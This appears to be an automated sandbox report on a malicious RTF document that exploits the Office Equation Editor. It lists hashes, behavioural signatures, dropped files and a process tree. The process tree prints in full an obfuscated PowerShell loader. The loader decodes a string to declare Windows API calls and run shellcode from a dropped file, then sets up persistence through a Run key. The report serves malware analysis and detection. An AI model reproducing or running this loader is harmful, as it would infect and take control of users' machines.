Overview

overview

7

Static

static

SecuriteIn...83.rtf

windows7-x64

7

SecuriteIn...83.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2022 14:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.2582.3383.rtf

  • Size

    1.1MB

  • MD5

    e029755d713d9fe984b86604a0f8b4f8

  • SHA1

    0b08f3f9d7e00fc1ca9d0aa3b05a54ec7b47ee0f

  • SHA256

    4937730a038a89a65fae406685e7e59b6616d3812d93e55fa6820be06ed4d720

  • SHA512

    d1cc5b55cefa9d05c1db2941b68e860bf59e6de76b23db455cf1e2d706cc686b4ffe530261cc354f508c6d43b5355ad49e068d69c5372981dd6bf13e8170b4b9

  • SSDEEP

    3072:zsqFhLZ+vNrlH5aposg90X41MKYiXexdmXbajh75V:zffZeyposg6X4giu2uh7L

Score
7/10
persistence

Malware Config

Signatures

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.2582.3383.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1816
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1904
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1304
      • C:\Windows\SysWOW64\CmD.exe
        CmD.exe /C cscript %tmp%\Client.vbs A C
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1112
        • C:\Windows\SysWOW64\cscript.exe
          cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1180
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Derea = """StdATildApodGel-CraTLymyDompSyveAkt Shr-tilTCrayLogpFiseForDCloeSnifGyniFronTeliSkutSlgiMisoilsnReo Epo'FlauPresByoiUninFingUnp RedSGnoyPresEuptFedeudbmHea;ResuSelsBoliNatnAntgLej MobSBrayFissDabtindeafvmflo.KarROpsuKamnAbotMdeihypmPoreKod.ButIWinnsygtMareTanrPuboHalpBraSUdfeLetrNorvPlaikrecUnseSkesSem;asepSkyuBlabSmklRefiCuscSne StasDomtFacaNartTariBracsme MafcdemlParaIdksSrbsPri SdeTWourOplaMetcMonhTeleYojaBiltVreiVra1Dus Aut{Cin[OveDSellSamlFloIHekmSanpFluooxirUnltGyn(Kai`"""SnowElgiEacnMoomEydmCer.gardHewlPollNol`"""Ele)Frn]PorpKuruBydbTrolsekiPercPla NicsScltAaraDretCheiInfcRee UnbeAutxSuptmvheStirUndnTil WamiResnSertCit GummAnuiOzodSlsiJelOVanuAdrtAudRUndesposPuseAfftRes(PorilornMw tPrv NosHOrnahjtmHusaDin)Tal;dis[PenDLislParlAscINepmUnspratoPibrDemtToh(Ady`"""NonkUrgeFolrlasnHeteBeslMaq3Sla2Spa`"""Kan)Fod]DispUveuPenbBorlcasiParcSki EsksRritSamaRaatCurigrfcMis PaneTraxBastTroeInvrPyrnRip PuriPetnRmetFra AutSGrueBertPreULinnStrhPlaaMuhnDisdLanlCureUnrdWilEWasxAlccUdmeHeapOldtAnsiUreoInsnUroFSpriNeilspitSyneRenrBuk(knaiAabnViotIdr JamIDesnOvedFonbArnoOcc)Kir;Rif[LodDcrelDislUngIRasmPripLinoSpyrSamtPav(Amu`"""AllkRefecherPlenKaseDoclLat3Sky2Han`"""Sol)Sup]RkepLabuSchbFurlTitiTwicfin PlesNdutPlaaGentIntiNoncTil FrieDalxStrtcapeChlrTednPla PeniEvonAmbtCed PlaGBasePestEuhTHaviFiacOplkArcCcunoshauRhonKystLiq(Sta)Dyk;Phr[wayDTillHemlTreIGrumConpElioImprSkotHle(Bom`"""CoouMacsSkreDrirFre3Syn2Ung`"""Stt)Grs]DerpPreuKombBrolBuniRodcAbr IncsHngtLimaOvetpodiGalcAnd SkreBjlxKortPryeEftrvannDis SiliLannpaptUdd LeuIHusnspesHoeeKlvrDistDelMSubeZarnIntuTerIYoktTreeSpemSte(SemiExenBartSub AleDSpliTyrsObecTiloSocrMed,ImpiSinnEnmtEss SubfAntePrarAkt,MariIndnSpatPro CoeSDenuShacKla,AneiNonnStatPhy JarAmejrSlooImmmMedaCub)Fis;Gim[ModDPerlbejlVddIAusmHyppDenoSterGhotFas(Muc`"""GuduDissLiceLoarDra3Udr2Per.FjldTamlSkilGal`"""Moz)Apo]GrapHypuBaubAfslNapiChacLre HebsMentAusaSamtTeoiAfvcTea LigeTekxSaltTraeUverRounWid UniIBognSydtUnpPGartEksrFod OmnCAptasuplKatlDatWHaliHepnRygdColoSemwNonPSterRewoGarcUbeWNub(tobIHjenKomtbarPMagtAbsrPil StrPThrrPauoNarsRibeesslPliyEmi5Unm,antianinFlatTra PenPReirRekoUstsrepeEndlNasySan6Cou,PriiCounTiltUdl TigPIrrrGldoRemsSereMytlMonyBer7Hug,MaciblonBistSls elePVesrStooShisGaleReclRidySpu8She,EsciGoonFrotIvy ExgPBoorStioUnrsproeAnslForyUnd9Mez)for;Hip[freDUnslFillYelIDatmPlapBetobesrpretSer(Non`"""TrikendeMetrkodnSmaeBrulFod3Dag2Can`"""Sou)Ind]GrapSkeuSocbErslSiliMascUds VissStetSlaaProtSh iPoscSka TrieUntxPretUdgeThurSaynAnf MosiZoonDistEne OveCleirUdbeUnhaPoltouteAmiDSkiiBehrHypeVolcVistOpsoFrorForyBul(VeniUrinTaftWak CraMTilaTmmnBondMarrOil,ErriPernSittEmu SlaFTerrMamaStovCatrSirsDyn)Ste;Tje[SemDYvelAdalHypIBalmPalpArboDalrSertFli(Tre`"""CalkNodeDihrFalnLyreAablLnm3Ing2Und`"""Ste)Sug]DagpOveuKaibLanlOutihalcFej VissUnqtBrlaDoutfoliCoccApp frieQuaxCartStoeHobrSkunLum RepiBehnPoltNee EmpMKedoLitvOmveShiFFraiWerlMazeTerESkixgen(IroiFionHartjin ConCDefhHypoRadnDisdDiprCon,ForiFranFortPli NonBborahypgImmlJudyLib,BadiPsenGyrtAri UnrKPrioRntmSil)und;Vaa[NavDShrlElelColIPolmJerpStroGrnrFantEmb(Lun`"""ExowCapiSnanPromBromAfs.KondUltlDenlMer`"""Vit)For]lftpThouAfvbTunlSuliBalcOce UnasAnttAmtaTrotConiSupcIde MiseAmbxFyntKlueForrrdvnSmi ProiRulnmertOps RetmDolihaexLooeSenrNilCKoglstaoRhysVekehem(FamiunpnMettTox udsSKeroPolnCeleKoo)Bje;Ano[TryDBiglWralVidIPhomnovpleaoBrerElytCac(Pla`"""DodiGlymGrimAgg3Con2Hom.AlldMeglSanlWea`"""Ski)Iri]KlipHiruRambplalAbbiElscQua lonsFlotSunaUndtUneiRidcfll HypeTirxUnftLeuePrerAflnFor enaiResnVovtFra JudIDramdecmEtaGIndeDritToaVMetiVddrAcotScouAlbaPhyldagKFadeRanySno(YakiLamnTratMan SitSLynvKvleDhadForkDog)Bug;Mil[DepDStalKonlAfpIElemPinpUdboPrerBiotPaa(Yar`"""LdekRoneArbrResnMonePetlPse3Ure2Bas`"""saf)Tjr]PropPlaumisbDislTreiSnecapa TsnsDebtFejaCurtBlaiEtycRam UndetanxUnetSmaeradrPranEdu ExtiAbjnKantSmr DefVMesiBonrKohtBiguKriathelrefARealTunlAbsoDeccrev(SubiCarnSprtAce ForvEve1Und,faniAuknRastFor ProvSik2Kne,OpviWignProtRef HemvMak3Spe,CadiUdlnPretMot penvBud4Sek)For;Sci[RulDKuvlJoklradIRommHirpNoroBlirSvitMon(Pns`"""PrewPoriGranBarsThipForoGenoOvelEsk.InsdMoarInevUnc`"""Glg)Non]KafpAquuTrabRedlpteiHovcLod FrosReftBaaaPentLoviTracSup LaneRykxBrutSokeHomrFornDem KatiBudnContArs ArcDAareVaglprieDamtReveXylPMrkrOmniPrenSlatProePhyrKalCPreoConnTranruteAnscStetPeriDeboAllnNon(KaliTranLyntGer VelTopgiStilUomrDat)Fje;Mon[ExhDunilGenlDelITygmBobpophoHrirBiltCri(Ren`"""PaauThrsSpreAalrBnn3und2Wan`"""Sch)Hie]PsepMamuFajbBirlColiTracTea SunsDdetMalaBedtAesiTrucEnv NedeJouxBlutskaeKasrBasnTus FrdichenUintMon encASubtFortDevaBamcCrahCroTForhhearOpieHalaTegdTipITernUdepQuouGartBro(UnsiSinnStatDis OphGPeaoskakStr,spailatnAvetmon OverFakiphogMenhban,UnbiPacnJamtBal VisTPhleTumkFis)Pre;Hjr[MorDFlolTrilPinITipmovepBogoKasrVogtAfs(For`"""ForuNubsPluePhyrPhe3Pru2Sug`"""Des)Ami]AnspUleuBinbForlPeriBescsle BansBiltTeaaradtTekiFodcTra TileBekxSyntbiteQuirRumnQua DagiDefnMistFor NecISornIgavAceaDemlSeliPubdGodaIndtTheeVirRReneTwicCostEks(OveiPahnAfstTac ReiCEksoretvOkseOve,FabiAttnUnstRen SalVJoraUdblOpkdrekeUng,RrliacenBantUdl ParIStulTruysausAssiSca)ped;Elm}Vis'Xer;Cou`$RedTBagrTilaBndcProhnejeOleaMontForiDru2Uds=Kva`$StreSecnClivIns:MaatTraeTilmEngpAkh Sar+ang Cha`"""duk\SaaGSolrAlgaskrnGna.MildPaaaLantVil`"""Sko;Acr`$AmaLLevnBotkTaxeNidrAhasNeusGuetEureSchrCel Acc=Imp KorGForepibtpri-farCcryoPopnMultCareTitnKrutViv Pri`$OplTdigrAmoaGencUnphDifemacaBlutpauiinv2Fro;Amb`$VanBFlgeUnisInvvCouoUopgAdfrChueStadVil Sel=Opb Col[KapSRepyPresChotPapeKukmMal.PreCRetoImbnflbvForeMinrKontGal]Kni:vas:TelFAccrcaroPramHowBSpuaBacscomePan6Spl4hedSFretIndrEnsiFennBragCle(ski`$MelLNamnSlakcareSuprHunsForsUnbtSameCaprBut)Tut;upd`$AkvTRivrRolaSlacudkhaareBetaNontretiDum3Rea=Egl[GavTVarrTaraHancTrihMuneUnpaDiatPhyiBru1Eve]Ash:Rom:RevVDisiMyxrTrotAnmuBasaBetlBesATellHanlbaioFaccSpo(enk0Bol,Chl1Adm0Men4Ren8Sko5Hel7til6Sar,Dis1Dyn2Tal2Pro8The8Kar,Sen6ver4Eft)Lac;Sub[PanSFamyShrsSkitbabeUdlmPro.TimRRecuFrenSkitBooiMarmInteama.AftIZannAfptDeneGifrannoBespNeuSConeWoorTohvFamiSticMoneSnosSnn.BemMAkvaAugrTiesStrhBrkaDialSiv]Pro:Mon:SinCtapoKrnpLivyBla(Uno`$appBNosekansBedvCyboTangLearBefeSpadCyp,Bnd Hus0Rec,ary Vap Cub`$CanTLobrMaraHazcReshPapeForaUdstSkiiCru3The,Ker Kvr`$OpbBSchestusSonvPreoBergPrerForeSpydLor.UnscSlooKlauNonncaltLil)Dau;Lev[HysTIndrTooaStacFlahGameBloaasctUnliflo1Gra]Uku:Ave:amiCPolaUndlabnlCerWoveiSubnRavdUdboStawSolPBalrAnioSyncuniWVis(Tmr`$AutTCharAdiaRekcUnrhLaceBacaPantMariIag3Dre,Fir Oms0Nos,Bev0Lde,Kop0Udl,Non0Ind)Taf#Kil;""";Function Tracheati4 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Prosely = $Prosely + $HS.Substring($i, 1); } $Prosely;}$symbiosens0 = Tracheati4 'CitIAmpEHeaXSco ';$symbiosens1= Tracheati4 $Derea;& ($symbiosens0) $symbiosens1;"
            4⤵
            • Checks QEMU agent file
            • Drops file in System32 directory
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1348
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jc4cbb-o.cmdline"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:768
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1103.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1102.tmp"
                6⤵
                  PID:1976
              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                5⤵
                • Checks QEMU agent file
                • Adds Run key to start application
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetWindowsHookEx
                PID:1256

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Client.vbs
        Filesize

        177KB

        MD5

        bcfb5c05a5695508cae014e0fb254785

        SHA1

        6cb6d497451b32d393f7b2dc1beb2b0baf80b0d3

        SHA256

        e443da0d45d95a550c2f2637c8b7f3000aa9fef71840a4deff34333ad51d3c32

        SHA512

        8a66382d94001e0662f63553d2fdb06335c52e37994425ad980f0c87c0f9b388635b21816dfba6542d694f5f96dc53b1666424c22f5a815c326bc5046e1c08db

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Gran.dat
        Filesize

        145KB

        MD5

        f8aa322d9439db5928769bbe829f3072

        SHA1

        965728def507bf74d495aaae6a67dec68e5a3355

        SHA256

        4c1a9a92d1f77a38d54b9fb583d905cbdb81362e3dc79dbec7a6477ae6463d08

        SHA512

        163db7c96d2739435e65367e18dca23a4c1426061d8df44a4a6b6ddcdd016a613169a6fe91786f46c7f1f3f60422a31bed1d23960418ec2d9a3b145fd87ee0ae

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RES1103.tmp
        Filesize

        1KB

        MD5

        4a02c97aedac902e349a556e2b1a89b8

        SHA1

        0356987cb326863a845c82ad760ffbdcf0a57252

        SHA256

        a2cde1b920dab9acbd4c7a53a1c8235836ea600342ee8dd3dde9861755823341

        SHA512

        d9d9f948f92bdc2ff1e36f4e44270abbe15f7e954da794426f6fa53f03b2c6f8c6795a0f6876dc33ae0d121462eb9dd3b130560c90d86b27bae55c8262dd0b1b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\jc4cbb-o.dll
        Filesize

        4KB

        MD5

        09031e1274eadfc33ad60574e481f1f7

        SHA1

        347559ff1208875268cbe2e9377908133f5ebe78

        SHA256

        fc6964feac3d56e0557c54b323134d363df046204e731139e5f7f5f4562d409d

        SHA512

        09feb6ed4d6c93bb18f7aa13f03f1fa91b4858574d76208065bafdca3fc8a212d3951185914ac60b42aaa4f7b2a529f6d61e0e97b38877e4a99400d6457e9ac0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\jc4cbb-o.pdb
        Filesize

        7KB

        MD5

        dc36d77f79a8e198df62e16f78653d02

        SHA1

        d0b39914f0b37fee3af2b2d8e8d9bc87ab6215c4

        SHA256

        78228919429efd755cfe14ec38e702c57f6e0f7500cb123feee4f055ea29be21

        SHA512

        1bd9390b24c1da4bcf507a2d06616a6b6b8661936af7bf6eb087a81ed8e11240023fcdb6dcc1157f2350bbe1d6c7d6d0bb2c8e3dd570b4159dd2039dac45b966

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\CSC1102.tmp
        Filesize

        652B

        MD5

        311fa8ac1f45147d63dce7c3545a07c1

        SHA1

        90636e4404088445de7d385c7dcea41426420aa4

        SHA256

        5fb4aa880a3b76a8000473a1a0f31cff6ec1b16f08947f719219613456a3ae89

        SHA512

        be130100c86ce28c015a4523ac588160bdbad5a0b3713c4b28cd2af4d18fd539fa6b3a0f11d6c613cd054ad3527a7487d44c28a7894999ff6fc75d154be2f696

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\jc4cbb-o.0.cs
        Filesize

        1KB

        MD5

        d4de9651ff0de82d29338c81aa6e5885

        SHA1

        acec3aa0a3d399927828f4975e5193a2727c7aa8

        SHA256

        d70e9a0ad03b8c827666c59d74addc16a72244a73ae85fe9a10bf5ea0cf4d5d5

        SHA512

        458333575625e306dac458b1274d7db85ea023d84f8fc958cdc41a2b65bb5192fa6f581348eb6b20ba1db10c635bbe18d1bc80fe2e4aeccdb76d1971b753a283

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\jc4cbb-o.cmdline
        Filesize

        309B

        MD5

        28b75d9e558248e48b9a14b783504b40

        SHA1

        c3441690c71346ac5a6c2f344a19b1ff3389bdf8

        SHA256

        48cc8dc53d767fc4b0a56aa56ffb2bcfc887141bd6b7153f2ed4cac0784477b3

        SHA512

        8ff6d2b79aa77c781e217cfecadadd8db97220ca0f3ab61120a1a504ff37475d82996cb7fda2a9fcd8373310fc09eec01afe71aef412b8df9adadcee47396d1d

        Download Submit

      • memory/768-71-0x0000000000000000-mapping.dmp

        Download

      • memory/1112-60-0x0000000000000000-mapping.dmp

        Download

      • memory/1180-61-0x0000000000000000-mapping.dmp

        Download

      • memory/1256-86-0x0000000000170000-mapping.dmp

        Download

      • memory/1256-85-0x0000000000170000-0x0000000000270000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1256-90-0x0000000000170000-0x0000000000270000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1256-95-0x0000000000170000-0x0000000000270000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1256-99-0x0000000077780000-0x0000000077929000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1348-89-0x0000000077960000-0x0000000077AE0000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/1348-88-0x0000000077960000-0x0000000077AE0000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/1348-70-0x0000000005B70000-0x0000000005DAF000-memory.dmp

        Filesize

        2.2MB

        Download

      • memory/1348-69-0x000000006AEA0000-0x000000006B44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1348-67-0x0000000000000000-mapping.dmp

        Download

      • memory/1348-101-0x0000000077960000-0x0000000077AE0000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/1348-100-0x0000000004EB0000-0x0000000004FB0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1348-80-0x0000000004EB0000-0x0000000004FB0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1348-81-0x000000006AEA0000-0x000000006B44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1348-82-0x0000000004EB0000-0x0000000004FB0000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1348-94-0x0000000077960000-0x0000000077AE0000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/1348-93-0x0000000077960000-0x0000000077AE0000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/1348-87-0x0000000077780000-0x0000000077929000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1816-91-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1816-54-0x0000000072AF1000-0x0000000072AF4000-memory.dmp

        Filesize

        12KB

        Download

      • memory/1816-57-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1816-92-0x000000007155D000-0x0000000071568000-memory.dmp

        Filesize

        44KB

        Download

      • memory/1816-58-0x000000007155D000-0x0000000071568000-memory.dmp

        Filesize

        44KB

        Download

      • memory/1816-64-0x000000007155D000-0x0000000071568000-memory.dmp

        Filesize

        44KB

        Download

      • memory/1816-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1816-55-0x0000000070571000-0x0000000070573000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1904-65-0x0000000000000000-mapping.dmp

        Download

      • memory/1904-66-0x000007FEFC001000-0x000007FEFC003000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1976-74-0x0000000000000000-mapping.dmp

        Download